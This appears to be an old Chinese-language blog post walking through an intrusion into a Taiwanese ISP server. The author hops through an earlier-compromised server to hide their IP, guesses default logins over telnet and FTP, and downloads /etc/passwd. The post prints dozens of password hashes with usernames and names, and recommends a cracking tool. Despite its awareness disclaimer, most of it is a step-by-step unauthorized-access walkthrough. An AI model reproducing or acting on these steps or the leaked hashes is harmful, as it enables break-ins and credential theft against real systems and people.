[前言]

對於著作這份文章的目的並不是在於教育.因為個人覺得台灣的網路雖然已經有所發展了...但是對於網路安全的重要性卻是漠不關心..或者是沒有足夠的知識....這是相當危險的一個現象..就算是大專院校.政府機構.公司行號...甚至是網路業者.ISP對於網路安全和系統管理的正確觀念和態度實在是相當缺乏...所以說不定在往後的日子裡,只要一台cp和一台數據機,就可以讓整個台灣網路崩潰....甚至是引起經濟危機!!就像是一個小孩子拿著一把槍在路上逛一樣...Too Bad!!所以我寫這篇文章純粹是為了台灣網路安全而寫的.並不希望有人因為這篇文章而去做違法的事情~~尤其是破壞別人的系統或是檔案!!
當然啦~如果有人因此做了違法的事情,本人概不負責!!!
"水能載舟也覆舟"....只是告訴你駭客是如何入侵你的系統.

[主題]

入侵

[困難度]

普通

[說明]

很久沒有寫文章了.因為最近和幾個網友們一起搞了一個站台…所以又開始來給它寫文章了..覺得有點痛苦.但是希望對網路安全有興趣的朋友能有所幫助…當然啦!!一開始要先從最基本的東西開始講起了…

[開始]

起先最最最基本的就是要用telnet和ftp了…它們兩個可是入侵的好幫手呦~~^^ …網路上有許多的telnet的版本.有彩色的啦.中文相容的啦..很多很多~但是如果你不想去花時間去下載的話….沒關係!!在windows下的Ms-Dos也有提供一個好用的telnet程式..當然也有ftp啦!!
如果你有telnet的軟體的話就打開吧....沒有的就用Ms-Dos的telnet.只要在Ms-Dos下打下telnet就可以了…然後就開始吧~~呵呵呵….
先連到自己的或者是你可以用的主機上

SunOS 5.6

login: Love-gone
Password:
Last login: Sun May 10 15:01:45 from 111.222.333.444
tcsh: getwd: Cannot open directory "../" (Permission denied)
tcsh: Trying to start from "/home/Love-gone"
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
Copyright by Andrew Chen 98/01/07
You have new mail.

(嘻嘻嘻….這是我以前入侵過的了…現在我把它當成是中間伺服器了..當然了ip和帳號都已經被我改了ㄚ~~怎麼可能用真的ip呢!!這個系統很有名的…我想只要是住在台灣的人都知道這個機構..但是我不能說.呵呵…)

>who (先確定一下這個主機現在有什麼人)
judge4 pts/1 May 10 15:17 (111.222.333.444)
root console May 9 12:24 (:0)
root pts/9 May 9 12:24 (:0.0)

(看來現在主機上應該不會有人發現我..呵…這樣就可以放心的連到這次要攻擊的目標上了…嗯~這次目標是www.fatman.com.tw…呵.別緊張~~那主機名稱是我已經修改過的了)

>telnet www.fatman.com.tw (先用telnet過去)

Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.

fatman login: guest (先試一試guest這個公用帳號看看)
Password:
Login incorrect (阿~~不成功..沒關係.我再試)

fatman login: news
Password:
Connection closed by foreign host.

(哇~~才兩次不成功就被趕出來了喔....這個系統還真狠..@&!J#~!)

> telnet www.fatman.com.tw (沒關係...再給它玩看看)

Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.

fatman login: fatman (駭客的第六感...)
Passwd:
Login incorrect

fatman login: system (這是系統的預設帳號...)
Passwd:
Login incorrect (看來已經被改過了..)
Connection closed by foreign host.
>ftp www.fatman.com.tw (改用ftp看看)

Connected to www.fatman.com.tw.
220-
220-
220- Fatman Communication Services ,INC
220-
220- Fatman有夠爛服務有限公司
220-
220- 高雄 FTP server
220-
220- There are 4 users in FTP Server now.
220- 目前已有 4 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- user@hostname.
220-
220-
220-
220 fatman FTP server (Version wu-2.4(2) Tue Oct 15 15:53:37 CST 1996) ready.
User (www.fatman.com.tw:(none)): fatman (還是一樣試一下公司的名字)
331 Password required for fatman.
Password:
530 Login incorrect.(真失敗~~今天運氣好像不太好的樣子)
Login failed.
ftp> user anonymous (用anonymous的公用帳號看看好了)
331 Guest login ok, send your complete e-mail address as password.
Password: (密碼隨便打..千萬別傻到打真的e-mail..打qq@就好)
230 Guest login ok, access restrictions apply.
ftp>pwd

(終於進來了..好辛苦~~~..先看看自己在那個資料夾在說)

257 "/" is current directory.
ftp> ls -la

(尋找一下目標 /etc)

200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 8
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 .
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 bin
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 etc
drwxrwxr-x 2 root wheel 1024 Dec 3 1993 incoming
drwxrwxr-x 2 root wheel 1024 Nov 17 1993 lib
drwxrwxr-x 2 root wheel 1024 Feb 2 01:20 pub
drwxrwxr-x 3 root wheel 1024 Jun 10 1996 usr
226 Transfer complete.
491 bytes received in 3.13 seconds (0.16 Kbytes/sec)

(嘻嘻....找到目標了..)

ftp> cd etc

(馬上攻擊進去)

250 CWD command successful. (嗯~可以進來...)
ftp> ls -la

(再看一下有沒有我們要的密碼檔/etc/passwd)

200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 4
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 .
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..
-rwxrwxr-x 1 root wheel 258 Dec 3 1993 group
-rwxrwxr-x 1 root wheel 532 Dec 3 1993 passwd
226 Transfer complete.
251 bytes received in 0.00 seconds (251000.00 Kbytes/sec)

(不會吧...竟然那麼容易)

ftp> get passwd

(二話不說..馬上抓密碼檔下來...呵呵.)

200 PORT command successful.
150 Opening ASCII mode data connection for /etc/passwd (321 bytes).
226 Transfer complete.
5515 bytes received in 1.60 seconds (1.01 Kbytes/sec)

ftp>bye
221 Goodbye.

(馬上走人)

>cat passwd

(看一下剛才的密碼檔是....)

root:*:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
.
.
.
[以下省略]

(真衰..是shadow過的密碼檔....也難怪用anonymous就能抓下來..如果就只有這個的話就無法解開密碼了....但是可以從裡面的帳號知道fatman有提供那些服務.像是uucp .mail . ftp . news ...
operator是開機用的,所以沒有用.daemon是用來分佩每一個帳號的權限用的)

>rm passwd

(還是把它給消到好了...)

>^D

(好累..先講到這裡吧...至少已經知道怎麼入侵到系統裡面了)

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-**-*-*-*-*-*-*-*-*-*-*-*
[休息時間]
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*--*-*-*-*-*-*-*-*-*-*-*-*-*-*

嗯~~接著上次還沒說完的話題..
上次是拿到了已經shadow過的/etc/passwd!!別以為它沒有用喔...呵呵..雖然不能直接用它還破解密碼.但是它也為我們收集到一些系統的資訊..現在就在把它拿出來看看吧...


SunOS 5.6

login: Love-gone
Password:
Last login: Sun May 10 15:01:45 from 111.222.333.444
tcsh: getwd: Cannot open directory "../" (Permission denied)
tcsh: Trying to start from "/home/Love-gone"
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
Copyright by Andrew Chen 98/01/07
You have new mail.

(還是一樣先連到中間伺服器,這樣可以確保不在攻擊的系統內留下自己的ip..別人也就不能用逆流法來找了...但是中間伺服器是越多越好!!)

>who

(還是看一下安不安全)

judge4 pts/1 May 10 15:17 (111.222.333.444)
root console May 9 12:24 (:0)
root pts/9 May 9 12:24 (:0.0)

(還是一樣沒人管)

>telnet www.fatman.com.tw

(攻擊開始...)


Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.

fatman login:nobody (先試一試被shadow過的密碼檔裡的帳號)
Password: (密碼也打nobody...)
Login incorrect

fatman login:news (再試一下這個好了..)
Password: (也是news..)

Linux 2.0.29.
You have mail.

(嗚哇啦!!!!進來了....千萬別看別人的信喔..)

fatman:~$ cd /etc (看能不能進來)
fatman:/etc$ ls

(看一下...)


DIR_COLORS hosts passwd.old
HOSTNAME hosts.allow passwd.save
HOSTNAME~ hosts.allow~ passwd~
NETWORKING hosts.deny ppp/
NNTP_INEWS_DOMAIN hosts.equiv printcap
X11@ hosts.lpd profile
aliases inet@ protocols
aliases.dir inetd.conf psdevtab
aliases.pag inittab rc.d/
at.deny inittab.gettyps.sample resolv.conf
bootptab inittab~ resolv.conf~
csh.cshrc ioctl.save rpc
csh.login issue securetty
default/ issue.net@ securetty.old
diphosts issue~ sendmail.cf
exports klogd.pid sendmail.st
fastboot ld.so.cache services
fdprm ld.so.conf shells
fs/ lilo/ skel/
fstab lilo.conf slip.hosts
ftp.banner localtime slip.login
ftp.deny magic snooptab
ftp.pids-local mail.rc sudoers
ftp.pids-remote motd syslog.conf
ftpaccess motd.bak syslog.pid
ftpconversions msgs/ termcap
ftpgroups mtab ttys
ftpusers.old mtools utmp@
gateways named.boot.bak vga/
gettydefs networks wtmp@
group nntpserver yp.conf.example
group~ passwd
host.conf passwd.OLD
fatman:/etc$ cat passwd

(接下來就直接看密碼再說...)


root:L3mUc0CQtJbtQ:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
www:et9dAbOK/d.22:502:20:WWW Manager:/home/staff/www:/bin/bash
kanglin:MuPKS0CUvOTZY:506:100:Kanglin:/home/w3/kanglin:/bin/bash
bakery:Cyaxe9TzJ231w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:9qdffJaMgRxih6g:509:100:Carven:/home/w3/carven:/bin/bash
prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
thfam:TMaFWlpc1jjwk:512:100:XXXXXXX:/home/w3/tham:/bin/bash
ccc:GqETv4g.CkVwI:513:100:ccc:/home/w3/ccc:/bin/bash
sk:sLz71sff56MVuY:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:XX:/home/w3/haurey/services:/bin/bash
order:LpnMHVgy9M/YU:516:100:XX:/home/w3/haurey/order:/bin/bash
corey:mhRsFO60fdFsMU:517:100:XXXXX:/home/w3/haurey/corey:/bin/bash
richard:fzhKTHW8.CKqU:519:100:richard:/home/w3/richard:/bin/bash
lilian:ozxKeTsi5REIQ:520:100:lilian:/home/w3/lilian:/bin/bash
support:vn0bgtsLAlF1HU:521:100:support:/home/w3/support:/bin/bash
hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
stosnny:hXgyLXFqcs/AHM:523:20::/home/staff/stonny:/bin/csh
becar:Donscgh0GVY/5c:524:100:bear:/home/w3/bear:/bin/bash
lanxce:IPf7USG6iwgxBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh
taiwankk:ijPWXFxmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash
lihxeng:6hGixt6xKgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash
caves:MiDgr92ymp2Mg:529:100:gallery:/home/w3/caves:/bin/bash
salecs:dL3OnAueiqVfw:518:100:prime:/home/w3/prime/sales:/bin/bash
kingtel:od7SRJ9xe/FjhM:530:100:kingtel:/home/w3/kingtel:/bin/bash
cp:ISunFXY9M0Hgc:530:100:kingtel:/home/w3/kingtel:/bin/bash
recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
recycle2:M0l95vf9h7vic:532:100:recycle2:/home/w3/recycle2:/bin/bash
recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash
recycle:CizrTipBMw/HE:534:100:recycle:/home/w3/recycle:/bin/bash
hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
goodbook:Ul8iUr9FzoFw2:535:100:goodbook:/home/w3/goodbook:/bin/bash
sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
charliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash
jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash
tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash
slb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash
s6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash
lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash
nalcom:XziVebJA8EO1.:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash
jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash
toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash
yahoo:DCIF2rp23sAZE:549:100:yahoo:/home/w3/yahoo:/bin/bash
basic:VlM0BAFKD314U:550:100:basic:/home/w3/basic:/bin/bash
basic1:Mi0gv.LN2wj2A:550:100:basic:/home/w3/basic:/bin/bash
basic2:FifwXaOXQy.J6:550:100:basic:/home/w3/basic:/bin/bash
basic3:VjgWDVTrpZ3uM:550:100:basic:/home/w3/basic:/bin/bash
basic4:fj3oHbeObcN46:550:100:basic:/home/w3/basic:/bin/bash
wunan:gdBvMnS0849pU:551:100:XXXXX:/home/w3/wunan:/bin/bash
kaoune:vd5VCD9OE87Ak:552:100:XXXXXXX:/home/w3/kaoune:/bin/bash
shuchuan:8et34aLi8OuyA:553:100:XX:/home/w3/shuchuan:/bin/bash
culture:ulQCNUH8dNmTo:551:100:XXXX:/home/w3/wunan:/bin/bash
fan:Jk6E9PqP7rxemg:554:100:fan:/home/w3/toonfish:/bin/bash
pierre:m9EpXqETIdvWM2:555:100:pierre:/home/pierre:/bin/bash
bausch:snwtjqhusCyqxQw:556:100::/home/w3/bausch:/bin/bash
saatchi:RIJ4layRsdHRBSM:557:100:XX:/home/w3/saatchi:/bin/bash
office:st0H2jg2gQjEqvI:558:100:XX:/home/w3/office:/bin/bash
poja:p7ptVmOq3nrUL.:559:100:XXXXXXXX:/home/w3/poja:/bin/bash
michelle:AmcgVpzMufCZJs:560:100:michelle:/home/w3/kingtel/michelle:/bin/bash
kloop:HboPgsyfndbAnE:544:100:XXXX:/home/w3/kloop:/bin/bash
people:Br.sC8VNnDVsA46:561:100:XXXX:/home/w3/people:/bin/bash
net:*MgwAiyhlgelfaU:564:1:*:/home/net:/bin/bash
caves0:PnjQ46ePzjx5xg:562:100:caves0:/home/w3/caves0:/bin/bash
erichou:DgkOzzWs0wVAwU:563:100:xxxx:/home/w3/erichou:/bin/bash
mikehxou:Oh0Xkkf.PhfepWs:565:100:mikehou:/home/w3/mikehou:/bin/bash
stevehou:IjIRrpcMz4K/ek:566:100:stevehou:/home/w3/stevehou:/bin/bash
water:B.9eP0GITFCgs:567:100:tiawanKK:/home/w3/water:/bin/bash
kanox:HoIbp4FOfvFmc.:568:100:tiawanKK:/home/w3/kanox:/bin/bash
louisa:u1gzbBv76EXBSU:569:20::/home/staff/louisa:/bin/csh
banafna:Ew5x9rZDifhfheCQs:570:100:xxx:/home/w3/banana:/bin/bash
trendfy:lHBdw2hGbNBZAI:570:100:banana:/home/w3/banana:/bin/bash
yenyun88:BbyphrvmuE7ww:571:100:toonfish:/home/w3/toonfish:/bin/bash
tonghai:KfwH4OYNQsK3c:572:100::/home/w3/tonghai:/bin/bash
chunti:Onhdw0Yso8EMpo:574:100::/home/w3/chunti:/bin/bash
jengjr:eH2UAa9VZI3hk:573:100:Jeng-jr LI:/home/jengjr:/bin/bash
chiniafn:FjYbcbfdhaJsk2vhON6:575:100:Chinian Wang:/home/chinian:/bin/bash
.
.
.
[以下省略.密碼檔我已經盡量碼賽克了]

(哇....太好了!!趕快換ftp來秀一下吧~~~)

fatman:/etc$ ^C
>ftp www.fatman.com.tw

(ftp兄來了...)


Connected to www.fatman.com.tw.
220-
220-
220- Fatman Communication Services ,INC
220-
220- Fatman有夠爛服務有限公司
220-
220- 高雄 FTP server
220-
220- There are 4 users in FTP Server now.
220- 目前已有 4 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- user@hostname.
220-
220-
220-
220 fatman FTP server (Version wu-2.4(2) Tue Oct 15 16:53:37 CST 1996) ready.
User (www.fatman.com.tw:(none)): news (用剛才入侵時的那個..)
331 Password required for news.
Password:
331 news login ok!
ftp>cd /etc
250 CWD command successful.
ftp>get passwd
200 PORT command successful.
150 Opening ASCII mode data connection for /etc/passwd (5921 bytes).
226 Transfer complete.
5515 bytes received in 2.80 seconds (1.97 Kbytes/sec)
ftp>bye

(落跑了...閃喔!!)

221 Goodbye.

(/etc/passwd既然已經到手了...接下來的事你應該知道吧..啥??不知道嗎???..那麼就在此解說一下好了...)

[Love-gone的話]

拿到密碼檔(/etc/passwd)後要做的就是破解它呀...看來我必須在這裡說明一下passwd的格式和意義了...

例如:
root:L3mUc0CQtJbtQ:0:0:root:/root:/bin/bash
密碼格式大多都是這個樣子的.然後每一欄都是用分號分開的..大多是6個分號...當然密碼格式有很多種..據我所知.目前我看過的密碼格式有5種了...但是大多數應該都是用6個分號的這種為多..然而每一欄代表的意義如下..

root:使用者名稱
L3mUc0CQtJbtQ:是已經經過編譯的密碼(coded-password)
0:UID(User Identification Number),就是使用者辨識碼
0:GID,就是使用群組的辨識碼
root:comments,註解欄..可能是電話號碼or住址
/root:home directory,就是所謂的來源目錄..即你的工作目錄
/bin/bash:這一欄是表示使用者簽入系統後,第一個執行的程式

因為是已經編譯過的單向密碼(One-Way Passwd),所以不可能反組譯....就只能使用所謂的暴力破解法了..關於暴力破解法的程式有很多..在此就不討論瞭解!我想你應該都知道才對..什麼??說我無情??..好吧!!建議你我用的是John4.0


[感言]

唉..從這份文章就可以知道台灣的網路安全做的非常不好..連提供撥接的isp公司都那麼容易被入侵..真可悲


創作者介紹
創作者 Neo Chao 的頭像
Neo Chao

My Life Going By My Style

Neo Chao 發表在 痞客邦 留言(1) 人氣()